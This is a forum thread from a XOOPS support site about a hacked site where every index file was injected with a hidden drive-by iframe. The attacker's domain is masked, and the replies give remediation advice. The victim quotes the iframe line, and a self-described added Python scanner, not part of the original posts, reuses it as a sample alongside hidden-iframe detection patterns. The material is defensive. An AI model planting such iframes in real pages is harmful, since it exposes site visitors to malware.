1
lamis_nador
I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 21:48

  • lamis_nador

  • Just popping in

  • Posts: 1

  • Since: 2009/1/11


Hello,

I need help, please. I checked my domain today and found an error on my index.php page. When I checked the page I found that code had been injected. Here is the code:

<iframe src="http://xxxx.cn/in.cgi?cocacola3" width=1 height=1 style="visibility: hidden"></iframe>

[EDIT by Mamba] I've replaced the domain name of the hacker, as Ghia suggested

I checked the rest of my domain and found out that every file named index has been injected with the same code, so all my index.php and index.html have been changed.

How can I remove this virus from my XOOPS site? :(

2
ghia
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 22:27

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Your site has been hacked. This can be due to a security failure of XOOPS, on your PC or of your hoster's server. Contact your hoster for the last case.

It is important to find out how the hacker managed to get access. Check out your logs. Delete the files on your site and replace them from a recent backup. Update your site to recent and stable versions. Inspect your database for sneaky data. Change all your passwords and check all the users that manage the site on all levels (MySQL, FTP, XOOPS webmasters and privileged groups). Read the advice given in some threads about hacked sites (follow show all) and the security News.

PS: Don't publish SPAM domains!
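A read-only scan for the situation in this thread, as an added example that is not part of any post or of XOOPS: it walks a web root, reports every index.* file carrying an invisible iframe like the one quoted above, and returns each file's modification time so it can be matched against the FTP or web server logs. The function names, the sample tree and the /map.html frame are constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Invisible frame: 0- or 1-pixel width/height, or hidden through inline CSS.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""", re.IGNORECASE)

def scan_index_files(root):
    """Return (path, iframe src, mtime in UTC) per hidden iframe in index.* files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index."):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            for tag in IFRAME_RE.findall(text):
                if HIDDEN_RE.search(tag):
                    src = SRC_RE.search(tag)
                    hits.append((path, src.group(1) if src else "", mtime.isoformat()))
    return hits

def demo():
    """Scan a constructed sample tree; returns sorted (relative path, src) pairs."""
    bad = ('<iframe src="http://xxxx.cn/in.cgi?cocacola3" width=1 height=1 '
           'style="visibility: hidden"></iframe>')  # line quoted in the thread
    ok = '<iframe src="/map.html" width="600" height="400"></iframe>'  # constructed
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "modules", "news"))
        samples = {"index.php": "<?php echo 'home'; ?>\n" + bad,
                   "index.html": "<html>" + ok + "</html>",
                   os.path.join("modules", "news", "index.php"): bad}
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        found = scan_index_files(root)
        return sorted((os.path.relpath(p, root), src) for p, src, _ in found)

if __name__ == "__main__":
    for rel, src in demo():
        print(rel, src)
```

The scan only reports; the affected files are still replaced from a clean backup as described above.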

3
stefan88
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 22:34

  • stefan88

  • Community Support Member

  • Posts: 1085

  • Since: 2004/9/20


Hi,

On top of what ghia said, you may post a list of used modules with versions and get some info on security threats and problems...

Clear the template cache and check the webmaster group for new members...

4
tank1955
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 23:00

  • tank1955

  • Module Developer

  • Posts: 276

  • Since: 2007/9/7 1


The exact same thing happened to me several months ago. The hacker managed to access and get a dump of my username and password list for the site. The password I was using to administer the site was the same password I used to access ftp.

I would suggest either looking at your server's ftp log or asking your host provider to look at the log. Even if you have to keep a hand written list of passwords I recommend never using the same password twice.

And when it comes to beefing up security for the future you should follow the advice of folks like ghia. He was fantastic at helping me work through my issues.

5
Mamba
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/12 0:38

  • Mamba

  • Moderator

  • Posts: 11250

  • Since: 2004/4/23


Quote:
Even if you have to keep a hand written list of passwords I recommend never using the same password twice.

Absolutely agree! And with tools like http://keepass.info/ that generate and keep passwords for you, there is really no excuse for not doing it.

Quote:
And when it comes to beefing up security for the future you should follow the advice of folks like ghia. He was fantastic at helping me work through my issues.

Yep, Ghia is D'Man!!! As a community we're so lucky to have him!!!